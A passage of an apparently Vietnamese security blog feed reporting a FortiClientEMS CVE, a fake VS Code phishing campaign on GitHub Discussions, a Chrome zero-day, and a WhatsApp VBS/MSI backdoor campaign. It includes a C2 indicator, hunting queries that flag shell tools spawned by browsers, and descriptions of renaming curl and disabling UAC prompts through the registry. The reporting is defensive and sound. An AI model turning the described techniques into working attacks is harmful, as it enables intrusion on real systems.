<p>Tại hai phiên bản FortiClientEMS 7.4.5 và 7.4.6, phần mềm này tồn tại một điểm yếu trong việc kiểm soát các yêu cầu truy cập được gửi tới hệ thống. Việc xử lý không an toàn này cho phép kẻ tấn công ẩn danh (unauthenticated attacker) từ xa, thông qua các request được gửi tới, có thể thực thi mã hoặc chạy lệnh trái phép trên hệ thống mục tiêu, từ đó giành quyền kiểm soát máy chủ FortiClientEMS chỉ từ một điểm tấn công bên ngoài.</p>
<p>CVE-2026-35616 tác động tới FortiClientEMS với những rủi ro cực kỳ lớn. Việc khai thác nhắm tới hệ thống này được coi là đòn bẩy mạnh mẽ cho kẻ tấn công do vai trò đầu não của nó. Một khi FortinetClientEMS bị hạ gục, toàn bộ các thiết bị đầu cuối mà nó kiểm soát đều sẽ bị đe dọa, tin tặc có thể tự do hành động các bước tấn công tiếp theo như triển khai mã độc tống tiền, di chuyển ngang trong mạng nội bộ hay đánh cắp thông tin nhạy cảm của hệ thống.</p>
<p>Đáng chú ý, chỉ tính riêng từ đầu năm 2026, FortinetClientEMS đã hai lần nhận được bản vá khẩn cấp. Trước đó vào tháng 2, như <strong>FPT Threat Intelligence</strong> đã <a href="https://blog.fiscybersec.com/lo-hong-nghiem-trong-trong-forticlientems-cho-phep-tin-tac-thuc-thi-ma-tu-xa">đưa tin</a>, Fortinet tiến hành vá CVE-2026-21643 do lỗi xử lý các phần tử trong câu lệnh SQL được truyền vào, cho phép kẻ tấn công ẩn danh thực thi mã hoặc câu lệnh trái phép thông qua các HTTP request độc hại.</p>
<img src="https://cdn.hashnode.com/uploads/covers/669e7a2f2c109ecd663148bd/cccbea70-9982-4919-969d-aeda2f0de893.png" alt="" style="display:block;margin:0 auto" />

<p>Hãng Fortinet cho biết CVE-2026-35616 và CVE-2026-21643 đều đang bị tin tặc tích cực khai thác trên thực tế. Theo watchTowr, các nỗ lực khai thác CVE-2026-35616 được ghi nhận bởi hệ thống bẫy honeypot của họ lần đầu tiên vào ngày 31 tháng 3 năm 2026. Trong thống kê của Shadowserver, trên toàn thế giới có hơn 2.000 máy chủ FortinetClientEMS có nguy cơ trở thành mục tiêu do chưa cập nhật bản vá bảo mật mới nhất, với Hoa Kỳ và Đức là hai quốc gia có số lượng instance dễ bị khai thác nhiều nhất, lần lượt là 593 và 163 máy chủ. Tại Việt Nam, con số này hiện nay được ghi nhận là 4.</p>
<h3>Khắc phục &amp; Khuyến nghị</h3>
<p>Do tính chất đặc biệt nghiêm trọng và hệ lụy diện rộng mà các lỗ hổng này mang lại, đội ngũ <strong>FPT Threat Intelligence</strong> khuyến nghị các đơn vị đang vận hành hệ thống Fortinet thực hiện ngay các biện pháp sau:</p>
<ol>
<li><p><strong>Cập nhật bản vá cho phần mềm:</strong> Cập nhật FortiClientEMS lên phiên bản <code>7.4.7</code> hoặc mới hơn. Điều này là cực kỳ quan trọng để đảm bảo sự an toàn cho hệ thống. Fortinet đã cung cấp hướng dẫn cập nhật cho hai phiên bản bị ảnh hưởng bởi CVE-2026-35616 tại hai liên kết dưới đây:</p>
<ul>
<li><p><a href="https://docs.fortinet.com/document/forticlient/7.4.5/ems-release-notes/832484">https://docs.fortinet.com/document/forticlient/7.4.5/ems-release-notes/832484</a> cho phiên bản FortiClientEMS 7.4.5</p>
</li>
<li><p><a href="https://docs.fortinet.com/document/forticlient/7.4.6/ems-release-notes/832484">https://docs.fortinet.com/document/forticlient/7.4.6/ems-release-notes/832484</a> cho phiên bản FortiClientEMS 7.4.6</p>
</li>
</ul>
<p>Ngoài ra, phiên bản FortinetClientEMS <code>7.4.2</code> không bị tác động bởi lỗ hổng này.</p>
</li>
<li><p><strong>Hạn chế truy cập từ bên ngoài:</strong> Không cho phép truy cập FortiClient EMS trực tiếp từ Internet. Chỉ cho phép quản trị từ mạng nội bộ hoặc các địa chỉ IP đáng tin cậy.</p>
</li>
<li><p><strong>Theo dõi và kiểm tra hệ thống:</strong> Thường xuyên kiểm tra log hệ thống để phát hiện các truy cập hoặc hành vi bất thường, kịp thời xử lý nếu có dấu hiệu xâm nhập.</p>
</li>
<li><p><strong>Tăng cường biện pháp bảo vệ tạm thời:</strong> Trong trường hợp chưa thể cập nhật ngay, nên áp dụng các biện pháp bảo vệ bổ sung như lọc truy cập web hoặc tăng cường giám sát bảo mật 24/7 để kịp thời ngăn chặn các dấu hiệu bất thường giúp giảm thiểu rủi ro.</p>
</li>
</ol>
<h3>Tham khảo</h3>
<ol>
<li><p><a href="https://fortiguard.fortinet.com/psirt/FG-IR-26-099">API authentication and authorization bypass</a></p>
</li>
<li><p><a href="https://blog.fiscybersec.com/lo-hong-nghiem-trong-trong-forticlientems-cho-phep-tin-tac-thuc-thi-ma-tu-xa#heading-thong-tin-chi-tiet">FPT Threat Intelligence</a></p>
</li>
<li><p><a href="https://dashboard.shadowserver.org/statistics/iot-devices/map/?date_range=1&amp;vendor=fortinet&amp;model=forticlient+enterprise+management+server+%28ems%29&amp;data_set=count&amp;scale=log&amp;auto_update=on">Shadowserver</a></p>
</li>
</ol>
]]></content:encoded></item><item><title><![CDATA[GitHub Discussions: Chiến Dịch Tấn Công Phishing Tinh Vi Giả Mạo Cảnh Báo Bảo Mật VS Code]]></title><description><![CDATA[GitHub Discussions: Chiến Dịch Phishing Giả Mạo Cảnh Báo Bảo Mật VS Code Nhắm Thẳng Vào Developer


Một trong hàng nghìn Discussion giả mạo được đăng trên GitHub (Nguồn: Socket)
Khi bạn nhận được emai]]></description><link>https://blog.fiscybersec.com/github-discussions-chi-n-d-ch-t-n-c-ng-phishing-tinh-vi-gi-m-o-c-nh-b-o-b-o-m-t-vs-code</link><guid isPermaLink="true">https://blog.fiscybersec.com/github-discussions-chi-n-d-ch-t-n-c-ng-phishing-tinh-vi-gi-m-o-c-nh-b-o-b-o-m-t-vs-code</guid><category><![CDATA[Traffic Distribution System]]></category><category><![CDATA[developer security]]></category><category><![CDATA[GitHub]]></category><category><![CDATA[phishing]]></category><category><![CDATA[social engineering]]></category><category><![CDATA[supply chain]]></category><category><![CDATA[VS Code]]></category><dc:creator><![CDATA[Nguyễn Văn Trung]]></dc:creator><pubDate>Sun, 05 Apr 2026 10:31:37 GMT</pubDate><enclosure url="https://i.ibb.co/twCBNmKD/92c8d7f0e542.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1>GitHub Discussions: Chiến Dịch Phishing Giả Mạo Cảnh Báo Bảo Mật VS Code Nhắm Thẳng Vào Developer</h1>
<img src="https://cdn.sanity.io/images/cgdhsj6q/production/2801d70b2fbaf37d8b9effb71a7a9724cb2f181e-1095x1085.png?w=1600&amp;q=95&amp;fit=max&amp;auto=format" alt="Fake VS Code Critical Exploit alert được đăng hàng loạt trên GitHub Discussions" style="display:block;margin:0 auto" />

<p><em>Một trong hàng nghìn Discussion giả mạo được đăng trên GitHub (Nguồn: Socket)</em></p>
<p>Khi bạn nhận được email thông báo từ GitHub rằng một repository bạn đang follow vừa post cảnh báo bảo mật khẩn cấp cho VS Code — bạn click vào. Đó chính xác là điều attackers đang cược.</p>
<p>Một chiến dịch phishing quy mô lớn phát hiện cuối tháng 3/2026 đang lạm dụng tính năng GitHub Discussions để phát tán malware, nhắm trực tiếp vào developer community. Điểm đáng lo ngại không phải là kỹ thuật phishing — mà là <strong>platform bị lạm dụng</strong>: GitHub, môi trường làm việc hàng ngày mà developer tin tưởng tuyệt đối.</p>
<hr />
<h2>Chi tiết chiến dịch</h2>
<h3>Bước 1 — Flood GitHub Discussions bằng fake advisory</h3>
<p>Attackers tạo hàng loạt GitHub Discussions với tiêu đề giả mạo security advisory:</p>
<ul>
<li><p><em>"Visual Studio Code – Severe Vulnerability – Immediate Update Required"</em></p>
</li>
<li><p><em>"Critical Exploit – Urgent Action Needed"</em></p>
</li>
<li><p><em>"Severe Threat – Update Immediately"</em></p>
</li>
</ul>
<p>Mỗi post chứa fake CVE ID, version range bịa đặt, và link download "bản vá khẩn cấp" trỏ về file-sharing service bên ngoài (chủ yếu Google Drive).</p>
<img src="https://cdn.sanity.io/images/cgdhsj6q/production/789d9a216b468b04b3a2e9942891a75fdaebe99a-1043x735.png?w=1600&amp;q=95&amp;fit=max&amp;auto=format" alt="Hàng trăm Discussions giả mạo xuất hiện đồng loạt trên GitHub search" style="display:block;margin:0 auto" />

<p><em>Hàng trăm Discussions giả mạo xuất hiện đồng loạt trên GitHub search (Nguồn: Socket)</em></p>
<p>Hàng nghìn post gần như giống hệt nhau xuất hiện chỉ trong vài phút, được đăng từ các tài khoản mới tạo hoặc có hoạt động rất thấp. Đây là dấu hiệu rõ của automation, không phải tấn công thủ công.</p>
<h3>Bước 2 — GitHub tự động amplify reach</h3>
<p>Đây là điểm thiết kế thông minh nhất của chiến dịch, và cũng là lý do tại sao GitHub là target lý tưởng.</p>
<p>Khi một Discussion được tạo hoặc user bị tag, <strong>GitHub tự động gửi email notification</strong> đến tất cả watcher và participant của repository. Kết quả: phishing message không chỉ nằm trên platform — nó xuất hiện trực tiếp trong inbox của developer, dưới dạng email gửi từ địa chỉ <code>notifications@github.com</code>.</p>
<img src="https://cdn.bsky.app/img/feed_thumbnail/plain/did:plc:64i6sq5y62tywsikkgplarbl/bafkreig54n47siygeuuqb7r4hcxgvdokpfjco5orxccgkgsxmsb6quo2bq" alt="GitHub Discussions trigger email notifications tới toàn bộ watcher" style="display:block;margin:0 auto" />

<p><em>GitHub Discussions trigger email notifications tới toàn bộ watcher (Nguồn: Socket)</em></p>
<p>Email từ GitHub domain, nội dung trông như security advisory, urgency language — ba yếu tố này cộng lại đủ để bypass cả người dùng kinh nghiệm.</p>
<h3>Bước 3 — Chuỗi redirect nhiều lớp có cookie-awareness</h3>
<p>Victim click link trong Discussion → không bị dẫn thẳng đến malware. Thay vào đó là một redirection chain được thiết kế để lọc traffic:</p>
<pre><code class="language-plaintext">GitHub Discussion link
    ↓
share.google/... (Google endpoint)
    ↓ (phân nhánh dựa trên cookie)
    ├── CÓ Google cookie → 301 redirect → drnatashachinn[.]com (C2 thực sự)
    └── KHÔNG có cookie → nhận fingerprinting page trực tiếp
    ↓
JavaScript fingerprinting + auto-POST data về C2
</code></pre>
<p>Logic phân nhánh dựa trên Google cookie là chi tiết kỹ thuật quan trọng nhất: hầu hết real user đang dùng browser bình thường đều có Google cookie active, nên họ bị route thẳng đến C2. Bot, scanner, và automated analysis tools thường không có cookie → nhận response khác, tránh được detection.</p>
<h3>Bước 4 — JavaScript fingerprinting tại landing page</h3>
<p>Landing page tại C2 không deliver malware ngay. Thay vào đó, một JavaScript script obfuscate nặng (dùng array-shuffling và string reconstruction) thu thập:</p>
<ul>
<li><p>Timezone và locale của browser</p>
</li>
<li><p>Platform và user-agent</p>
</li>
<li><p>Secondary user-agent qua hidden iframe</p>
</li>
<li><p>Automation signals: <code>navigator.webdriver</code> (phát hiện headless browser/bot)</p>
</li>
<li><p>URL hash values (dùng cho campaign tracking)</p>
</li>
</ul>
<p>Toàn bộ data được encode và tự động POST về cùng endpoint mà không cần user interaction. Không có malware, không có credential harvesting ở giai đoạn này.</p>
<p>Behavior này nhất quán với <strong>Traffic Distribution System (TDS)</strong> — một lớp filtering/profiling trước khi route victim đến secondary attack stage (phishing page, exploit kit, hoặc payload download tùy loại nạn nhân). Tại thời điểm phân tích, secondary stage chưa được xác định.</p>
<hr />
<h2>Tại sao GitHub là target lý tưởng</h2>
<p>Pattern này không ngẫu nhiên. Attackers đã khai thác GitHub hai lần trước đó:</p>
<ul>
<li><p><strong>Tháng 3/2025:</strong> Chiến dịch nhắm vào 12.000 repositories, lừa developer authorize một OAuth app độc hại để chiếm quyền truy cập tài khoản</p>
</li>
<li><p><strong>Tháng 6/2024:</strong> Khai thác GitHub email system qua spam comment và pull request để redirect user đến phishing page</p>
</li>
</ul>
<p>GitHub Discussions là vector mới nhất vì một lý do đơn giản: <strong>moderation threshold thấp hơn nhiều</strong> so với official security advisories. Bất kỳ tài khoản nào cũng có thể post Discussion vào hầu hết public repository, không cần approval.</p>
<p>Kết hợp với notification system tự động và trust context của platform, Discussions đang trở thành phishing delivery channel hiệu quả hơn cả email truyền thống đối với developer audience.</p>
<p>Và chiến dịch này không đơn độc — <a href="https://www.helpnetsecurity.com/2026/03/24/github-malware-split-payload/">GitHub-hosted malware campaign uses split payload to evade detection</a> được Help Net Security ghi nhận cùng tuần cho thấy pattern tương tự: attackers đang đẩy infostealer qua hơn 300 package giả mạo AI tool và game cheat, hosted trực tiếp trên GitHub. GitHub đang bị biến thành malware distribution infrastructure, không chỉ là attack vector một lần.</p>
<hr />
<h2>Góc nhìn từ phía defender</h2>
<h3>Developer đang bị nhắm đích vì lý do cụ thể</h3>
<p>Developer machine không phải target ngẫu nhiên. Một workstation của developer thường chứa: source code của công ty, SSH key và API token, credential truy cập cloud environment, và access vào CI/CD pipeline. Một lần nhiễm malware trên developer endpoint có thể cascade thành supply chain compromise với phạm vi ảnh hưởng rộng hơn nhiều so với endpoint user thông thường.</p>
<p>Chiến dịch này nhắm vào VS Code cụ thể là vì VS Code là IDE phổ biến nhất trong developer community — attack surface rộng nhất có thể.</p>
<h3>TDS là dấu hiệu của operation chuyên nghiệp</h3>
<p>Việc dùng Traffic Distribution System thay vì deliver malware trực tiếp cho thấy operation có đầu tư. TDS cho phép operator: A/B test payload theo geolocation, lọc bot và researcher, thay đổi secondary payload mà không cần update primary infrastructure, và track conversion rate theo campaign. Đây không phải tool của script kiddie.</p>
<h3>Fake CVE là red flag có thể verify ngay</h3>
<p>Một trong những điểm yếu của chiến dịch là CVE fabricated. Mọi CVE hợp lệ đều có thể verify trong vòng 30 giây tại <a href="https://nvd.nist.gov/">NVD</a> hoặc <a href="https://cve.mitre.org/">MITRE CVE</a>. Nếu CVE trong cảnh báo không tồn tại trong database — đó là lure.</p>
<hr />
<h2>Detection và phòng thủ</h2>
<h3>Cho individual developer</h3>
<p><strong>Verify trước khi click:</strong></p>
<ul>
<li><p>CVE thật phải có trong NVD, MITRE CVE, hoặc CISA KEV catalog</p>
</li>
<li><p>VS Code update chỉ đến từ <code>code.visualstudio.com</code> hoặc trong-app update — không bao giờ từ Google Drive</p>
</li>
<li><p>Account đăng advisory mới tạo hoặc ít hoạt động → red flag</p>
</li>
</ul>
<p><strong>Indicators cần chú ý:</strong></p>
<pre><code class="language-plaintext">C2 domain:    drnatashachinn[.]com
Redirect:     share.google → 301 → C2
Pattern:      Fake CVE + external download link + urgency + mass-tagging
</code></pre>
<h3>Cho security team và tổ chức</h3>
<pre><code class="language-plaintext"># Monitor outbound connection từ developer endpoint đến domain lạ
# sau khi click link từ GitHub notification email
network.destination: *drnatashachinn* OR
    (referrer: "github.com/*/discussions/*" AND destination: !github.com)

# Hunt GitHub Discussion notification email chứa external download link
email.sender: "notifications@github.com"
AND email.body: ("google drive" OR "drive.google" OR "mega.nz")
AND email.body: ("vulnerability" OR "CVE" OR "critical")

# Process spawn bất thường sau khi browser mở link từ GitHub
parent_process: browser
AND child_process: (powershell OR cmd OR wscript OR curl)
</code></pre>
<p><strong>Khuyến nghị tổ chức:</strong></p>
<ul>
<li><p>Enforce policy: software update chỉ qua approved channels, không phải link từ third-party</p>
</li>
<li><p>Train developer team nhận biết GitHub-based phishing — khác với email phishing truyền thống</p>
</li>
<li><p>Consider network egress filtering cho developer endpoint, đặc biệt đối với domain không thuộc whitelist xuất hiện sau GitHub notification click</p>
</li>
</ul>
<hr />
<h2>Nhận định</h2>
<p>GitHub Discussions bị vũ khí hóa thành phishing channel là một bước leo thang đáng lo ngại — không phải vì kỹ thuật quá tinh vi, mà vì <strong>nó khai thác trust theo cách rất khó train người dùng phòng tránh</strong>. Developer được training để cẩn thận với email lạ. Họ không được training để nghi ngờ notification từ <code>notifications@github.com</code> về repository họ đang contribute.</p>
<p>Pattern này sẽ tiếp tục. GitHub không phải platform duy nhất có collaborative feature bị khai thác kiểu này — GitLab Issues, Bitbucket, npm package READMEs đều là attack surface tiềm năng tương tự. Defender cần shift từ "trust the platform, verify the content" sang "verify cả platform feature được dùng để deliver content".</p>
<hr />
<p><em>Nguồn tham khảo:</em></p>
<ul>
<li><p><a href="https://socket.dev/blog/widespread-github-campaign-uses-fake-vs-code-security-alerts-to-deliver-malware">Widespread GitHub Campaign Uses Fake VS Code Security Alerts to Deliver Malware</a> — Socket Security (Sarah Gooding, Peter van der Zee)</p>
</li>
<li><p><a href="https://www.bleepingcomputer.com/news/security/fake-vs-code-alerts-on-github-spread-malware-to-developers/">Fake VS Code alerts on GitHub spread malware to developers</a> — BleepingComputer</p>
</li>
<li><p><a href="https://www.helpnetsecurity.com/2026/03/24/github-malware-split-payload/">GitHub-hosted malware campaign uses split payload to evade detection</a> — Help Net Security / Netskope</p>
</li>
<li><p><a href="https://www.techzine.eu/news/security/140055/major-phishing-campaign-on-github-using-fake-security-alerts/">Major phishing campaign on GitHub using fake security alerts</a> — Techzine</p>
</li>
<li><p><a href="https://github.blog/security/supply-chain-security/strengthening-supply-chain-security-preparing-for-the-next-malware-campaign/">Strengthening supply chain security: Preparing for the next malware campaign</a> — GitHub Security Blog</p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Lỗ hổng zero-day nghiêm trọng trong Google Chrome đang bị khai thác trên thực tế]]></title><description><![CDATA[Đầu tháng 04 năm 2026, Google phát hành bản vá cho 21 lỗ hổng nghiêm trọng, tồn tại trong trình duyệt Google Chrome. Đáng chú ý, trong số các lỗ hổng nhận được bản vá lần này, xuất hiện một lỗ hổng đã]]></description><link>https://blog.fiscybersec.com/l-h-ng-zero-day-nghi-m-tr-ng-trong-google-chrome-ang-b-khai-th-c-tr-n-th-c-t</link><guid isPermaLink="true">https://blog.fiscybersec.com/l-h-ng-zero-day-nghi-m-tr-ng-trong-google-chrome-ang-b-khai-th-c-tr-n-th-c-t</guid><category><![CDATA[Google Chrome]]></category><category><![CDATA[threat intelligence]]></category><category><![CDATA[vulnerability]]></category><dc:creator><![CDATA[Mai Đức Nam Anh]]></dc:creator><pubDate>Sun, 05 Apr 2026 03:30:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/669e7a2f2c109ecd663148bd/e248850c-2f8c-43c2-b07c-b938b2beb49f.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Đầu tháng 04 năm 2026, Google phát hành bản vá cho 21 lỗ hổng nghiêm trọng, tồn tại trong trình duyệt Google Chrome. Đáng chú ý, trong số các lỗ hổng nhận được bản vá lần này, xuất hiện một lỗ hổng đã và đang bị tin tặc khai thác trong các cuộc tấn công trên thực tế.</p>
<h3>Thông tin chi tiết</h3>
<ul>
<li><p><em>Định danh lỗ hổng:</em> <a href="https://nvd.nist.gov/vuln/detail/CVE-2026-5281"><strong>CVE-2026-5281</strong></a></p>
</li>
<li><p><em>Điểm CVSS (3.1):</em> <strong>8.8</strong></p>
</li>
<li><p><em>Mức độ nghiêm trọng:</em> <strong>HIGH</strong> - Nghiêm trọng cao</p>
</li>
<li><p><em>Mô tả tóm tắt:</em> Lỗi use-after-free (sử dụng bộ nhớ sau khi giải phóng) trong thành phần <code>Dawn</code> trên Google Chrome, cho phép kẻ tấn công từ xa sau khi chiếm được quyền kiểm soát tiến trình renderer (tiến trình kết xuất) có thể thực thi mã tùy ý thông qua một trang HTML độc hại.</p>
</li>
<li><p><em>Phiên bản bị ảnh hưởng:</em> Google Chrome trước phiên bản <code>146.0.7680.178</code></p>
</li>
</ul>
<p><strong>Dawn</strong> là một dự án mã nguồn mở trong hệ sinh thái Chromium, đóng vai trò là bản thực thi (implementation) chính thức của tiêu chuẩn WebGPU. Đây là lớp trung gian (middleware) cho phép các ứng dụng web truy cập trực tiếp và hiệu quả vào khả năng tính toán đồ họa của phần cứng (GPU) thông qua trình duyệt.</p>
<p>Chức năng cốt lõi của Dawn bao gồm:</p>
<ul>
<li><p>Cung cấp API WebGPU: Thay thế WebGL để giải quyết các hạn chế về hiệu suất, hỗ trợ các tính năng hiện đại như <em>Compute Shaders</em> và xử lý đa luồng.</p>
</li>
<li><p>Quản lý Tài nguyên: Tự động hóa việc quản lý bộ nhớ GPU, pipeline state và đồng bộ hóa các lệnh thực thi.</p>
</li>
<li><p>Tính di động (Portability): Cung cấp một lớp trừu tượng duy nhất cho các lập trình viên và nhà phát triển, giúp mã nguồn chạy nhất quán trên các kiến trúc phần cứng khác nhau.</p>
</li>
</ul>
<p>Do tiếp xúc trực tiếp với Driver đồ họa nên Dawn được thiết kế với các cơ chế bảo mật nghiêm ngặt. Lớp trung gian này luôn duy trì kiểm tra tính hợp lệ của lệnh trước khi gửi tới GPU để tránh lỗi tràn bộ nhớ hoặc can thiệp trái phép, đồng thời hoạt động cô lập trong tiến trình GPU riêng biệt nhằm hạn chế rủi ro khai thác từ lỗ hổng <em>Use-after-free</em> hoặc truy cập bộ nhớ ngoài phạm vi (Out-of-bounds).</p>
<p>Tuy nhiên, trong đợt phát hành bản vá bảo mật mới nhất của Google, hãng thông báo thành phần này đang bị tin tặc tích cực khai thác trong các cuộc tấn công trên thực tế, do sự xuất hiện của một lỗ hổng zero-day nghiêm trọng mới trong trình duyệt Google Chrome, được định danh <strong>CVE-2026-5281</strong> - một lỗi Use-after-free trong thành phần Dawn.</p>
<p>Thông thường lỗi Use-after-free xảy ra khi một chương trình tiếp tục truy cập hoặc sử dụng một con trỏ (pointer) trỏ đến vùng nhớ đã được giải phóng (deallocated/freed). Kẻ tấn công từ xa có thể lợi dụng lỗ hổng này để đánh lừa hệ thống và ghi đè những dữ liệu độc hại vào vùng nhớ đã giải phóng. Khi chương trình thực hiện lệnh gọi hàm từ con trỏ cũ, nó sẽ thực thi mã của kẻ tấn công thay vì mã gốc.</p>
<p>Trong ngữ cảnh của CVE-2026-5281, Google cho biết nếu kẻ tấn công từ xa kiểm soát được tiến trình render của trình duyệt, có thể tuỳ ý thực thi mã trên hệ thống mục tiêu thông qua một trang HTML độc hại chứa đoạn mã khai thác, đồng thời không ngoại trừ khả năng lỗ hổng này cũng có thể bị lợi dụng làm bàn đạp nhằm vượt qua các cơ chế "sandbox" bảo mật của trình duyệt, tạo tiền đề triển khai các payload độc hại tiếp theo, khai thác leo thang đặc quyền, tiếp cận dữ liệu nhạy cảm hoặc gây ra tình trạng xung đột bộ nhớ dẫn đến crash ứng dụng, gây tình trạng từ chối dịch vụ trên hệ thống.</p>
<p>Đợt cập nhật này diễn ra ngay sau khi Google vừa xử lý hai lỗ hổng nghiêm trọng khác (CVE-2026-3909 và CVE-2026-3910) vốn cũng bị khai thác dưới dạng zero-day. Trước đó vào tháng 2, hãng này cũng đã vá một lỗi use-after-free trong thành phần CSS của Chrome (CVE-2026-2441). Tính tổng cộng, kể từ đầu năm đến nay, Google đã vá 4 lỗ hổng zero-day của Chrome bị khai thác trên thực tế.</p>
<h3>Khắc phục &amp; Khuyến nghị</h3>
<p>Mức độ nguy hiểm và phạm vi ảnh hưởng mà lỗ hổng này tác động là cực kỳ lớn do trình duyệt Google Chrome được sử dụng rộng rãi bởi người dùng cá nhân, các doanh nghiệp hay các trình duyệt phụ thuộc nhân Chromium như Microsoft Edge, Brave, Opera,... Do đó việc khắc phục, áp dụng các bản vá bảo mật mới nhất là điều cấp thiết, cần được thực hiện ngay.</p>
<p>Đội ngũ <strong>FPT Threat Intelligence</strong> khuyến nghị:</p>
<ol>
<li><p><strong>Cập nhật trình duyệt:</strong> Người dùng và các quản trị viên hệ thống có sử dụng Google Chrome hay các trình duyệt nhân Chromium tương ứng cần áp dụng bản vá mới nhất dưới đây:</p>
<ul>
<li><p>Windows và MacOS: <code>146.0.7680.177 / 178</code></p>
</li>
<li><p>Linux: <code>146.0.7680.177</code></p>
</li>
</ul>
</li>
<li><p><strong>Cảnh giác trước các website lạ:</strong> Tránh truy cập vào các website không rõ nguồn gốc, được gửi kèm trong email hay các liên kết lạ trên mạng xã hội hay từ các nguồn không rõ trên internet.</p>
</li>
<li><p><strong>Giám sát các hành vi bất thường:</strong> Đối với môi trường doanh nghiệp, quản trị viên hệ thống có thể triển khai giám sát lưu lượng mạng, giám sát hệ thống 24/7 nhằm phát hiện sớm các dấu hiệu bất thường cũng như ngăn chặn các hành vi khai thác nguy hiểm nhắm tới hệ thống.</p>
</li>
</ol>
<h3>Tham khảo</h3>
<ol>
<li><a href="https://chromereleases.googleblog.com/2026/03/stable-channel-update-for-desktop_31.html">Chrome releases</a></li>
</ol>
]]></content:encoded></item><item><title><![CDATA[Chiến Dịch Malware Qua WhatsApp Phát Tán VBS và MSI Backdoor]]></title><description><![CDATA[Tóm Tắt
Vào cuối tháng 2 năm 2026, nhóm Microsoft Defender Experts đã phát hiện một chiến dịch tấn công tinh vi sử dụng ứng dụng nhắn tin WhatsApp để phát tán các tệp Visual Basic Script (VBS) độc hại]]></description><link>https://blog.fiscybersec.com/chi-n-d-ch-malware-qua-whatsapp-ph-t-t-n-vbs-v-msi-backdoor</link><guid isPermaLink="true">https://blog.fiscybersec.com/chi-n-d-ch-malware-qua-whatsapp-ph-t-t-n-vbs-v-msi-backdoor</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[whatsapp]]></category><dc:creator><![CDATA[Đinh Văn Mạnh]]></dc:creator><pubDate>Sun, 05 Apr 2026 03:03:22 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/669e2578c18c3baa1b4fc070/0eb8ff79-1c0b-4952-b0a8-5709211480e1.jpg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<hr />
<h2>Tóm Tắt</h2>
<p>Vào cuối tháng 2 năm 2026, nhóm Microsoft Defender Experts đã phát hiện một chiến dịch tấn công tinh vi sử dụng ứng dụng nhắn tin WhatsApp để phát tán các tệp Visual Basic Script (VBS) độc hại đến người dùng Windows. Sau khi nạn nhân thực thi tệp này, một chuỗi lây nhiễm nhiều giai đoạn sẽ được kích hoạt, dẫn đến việc kẻ tấn công chiếm quyền kiểm soát hoàn toàn hệ thống thông qua các backdoor MSI. Điểm đặc biệt của chiến dịch là việc kết hợp giữa <strong>kỹ thuật social engineering</strong>, <strong>Living-off-the-Land (LotL)</strong> và <strong>cloud infrastructure công khai</strong> để né tránh các giải pháp bảo mật.</p>
<hr />
<h2>Bức Tranh Mối Đe Dọa (Threat Landscape)</h2>
<p>Chiến dịch này nằm trong xu hướng tấn công ngày càng phổ biến: khai thác các nền tảng liên lạc đáng tin cậy như WhatsApp để phát tán mã độc. Thay vì dùng email phishing truyền thống, kẻ tấn công khai thác lòng tin mà người dùng đặt vào các ứng dụng nhắn tin quen thuộc để vượt qua rào cản tâm lý. Điều đáng lo ngại là hiện tại <strong>chưa xác định được nội dung mồi nhử (lure)</strong> mà kẻ tấn công dùng để thuyết phục nạn nhân mở file VBS.</p>
<hr />
<h2>Chuỗi Tấn Công Chi Tiết (Attack Chain)</h2>
<p>Chiến dịch được chia thành 4 giai đoạn rõ ràng, với mỗi giai đoạn xây dựng nền tảng cho giai đoạn tiếp theo:</p>
<img src="https://cdn.hashnode.com/uploads/covers/669e2578c18c3baa1b4fc070/9fcbb89d-0724-495d-91c3-fdb142840f8c.png" alt="" style="display:block;margin:0 auto" />

<h3>Giai đoạn 1 — Xâm nhập ban đầu (Initial Access via WhatsApp)</h3>
<p>Tệp VBS độc hại được gửi trực tiếp qua tin nhắn WhatsApp. Khi nạn nhân thực thi, script sẽ:</p>
<ul>
<li><p>Tạo thư mục ẩn tại <code>C:\ProgramData\EDS8738</code></p>
</li>
<li><p>Sao chép và <strong>đổi tên các công cụ Windows hợp lệ</strong>: <code>curl.exe</code> → <code>netapi.dll</code>, <code>bitsadmin.exe</code> → <code>sc.exe</code></p>
</li>
<li><p>Các file đổi tên này vẫn giữ nguyên metadata PE gốc (<code>OriginalFileName</code>), tạo ra tín hiệu phát hiện tiềm năng cho các giải pháp EDR</p>
</li>
</ul>
<h3>Giai đoạn 2 — Tải payload từ cloud (Payload Retrieval)</h3>
<p>Sử dụng các binary đã đổi tên ở trên với cờ downloader, malware kết nối đến các dịch vụ cloud uy tín để tải payload thứ cấp:</p>
<ul>
<li><p><code>auxs.vbs</code> và <code>WinUpdate_KB5034231.vbs</code> được host trên <strong>AWS S3</strong>, <strong>Tencent Cloud</strong>, và <strong>Backblaze B2</strong></p>
</li>
<li><p>Kỹ thuật này khiến các request độc hại trông như traffic hệ thống bình thường, gây khó khăn cho việc phân biệt hoạt động hợp lệ và tấn công</p>
</li>
</ul>
<h3>Giai đoạn 3 — Leo thang đặc quyền &amp; Persistence</h3>
<p>Đây là giai đoạn then chốt nhất của chiến dịch:</p>
<ul>
<li><p>Malware sửa giá trị registry <code>ConsentPromptBehaviorAdmin</code> để <strong>vô hiệu hóa UAC prompt</strong></p>
</li>
<li><p>Liên tục thử khởi chạy <code>cmd.exe</code> với đặc quyền cao, lặp lại cho đến khi thành công hoặc bị ngắt buộc</p>
</li>
<li><p>Ghi cơ chế persistence vào registry tại <code>HKLM\Software\Microsoft\Win</code> để đảm bảo tồn tại qua các lần reboot</p>
</li>
<li><p>Toàn bộ quá trình leo thang đặc quyền diễn ra <strong>không cần tương tác người dùng</strong></p>
</li>
</ul>
<h3>Giai đoạn 4 — Triển khai backdoor cuối (Final Payload)</h3>
<p>Giai đoạn cuối cùng cài đặt các MSI installer <strong>không có chữ ký số hợp lệ</strong>:</p>
<table>
<thead>
<tr>
<th>Tên file</th>
<th>Mô tả</th>
</tr>
</thead>
<tbody><tr>
<td><code>AnyDesk.msi</code></td>
<td>Giả mạo phần mềm điều khiển từ xa hợp lệ, tạo kết nối persistent</td>
</tr>
<tr>
<td><code>Setup.msi</code></td>
<td>Installer backdoor chung</td>
</tr>
<tr>
<td><code>WinRAR.msi</code></td>
<td>Giả mạo công cụ nén phổ biến</td>
</tr>
